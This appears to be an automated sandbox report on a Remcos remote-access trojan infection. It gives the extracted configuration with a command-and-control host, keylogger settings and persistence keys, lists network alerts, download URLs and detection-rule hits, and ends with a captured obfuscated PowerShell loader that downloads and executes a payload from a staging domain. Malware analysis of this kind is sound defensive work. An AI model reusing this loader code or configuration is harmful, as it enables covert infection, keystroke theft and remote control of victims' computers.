Source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": ["fumecexpsales1international.duckdns.org:50396:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T15VJD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"} |
Source: Yara match |
File source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR |
Source: Yara match |
File source: C:\ProgramData\remcos\logs.dat, type: DROPPED |
Source: |
Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: indows\System.Core.pdbui source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49428 -> 185.236.203.101:50396 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49474 -> 185.236.203.101:50396 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49543 -> 185.236.203.101:50396 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49541 -> 185.236.203.101:50396 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49538 -> 185.236.203.101:50396 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49522 -> 185.236.203.101:50396 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49540 -> 185.236.203.101:50396 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49542 -> 185.236.203.101:50396 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49544 -> 185.236.203.101:50396 |
Source: global traffic |
TCP traffic: 185.236.203.101 ports 0,3,50396,5,6,9 |
Source: global traffic |
HTTP traffic detected: GET /bin/Interplea.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clCache-Control: no-cache |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /bin/Interplea.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clCache-Control: no-cache |
Source: wscript.exe, 00000000.00000002.2066149580.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063357887.000001FB2D8DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.2063357887.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2066149580.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.2046230842.000001FB2F914000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046040317.000001FB2F914000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabB |
Source: wscript.exe, 00000000.00000002.2066149580.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063357887.000001FB2D8DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe |
Source: wscript.exe, 00000000.00000003.2046141045.000001FB2D95F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045915330.000001FB2D937000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?97dbf7f69e |
Source: powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CC96C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://torresvmackenna.cl |
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CB8C6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CB16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178361107.000001A2CC235000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://torresvmackenna.cl |
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAF55000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://torresvmackenna.cl/bin/Interplea.snpP |
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://torresvmackenna.cl/bin/Interplea.snpXR#l |
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3318420057.0000000000CE0000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin |
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin1 |
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.binb |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49401 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49401 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: Yara match |
File source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR |
Source: Yara match |
File source: C:\ProgramData\remcos\logs.dat, type: DROPPED |
Source: amsi32_7108.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.D |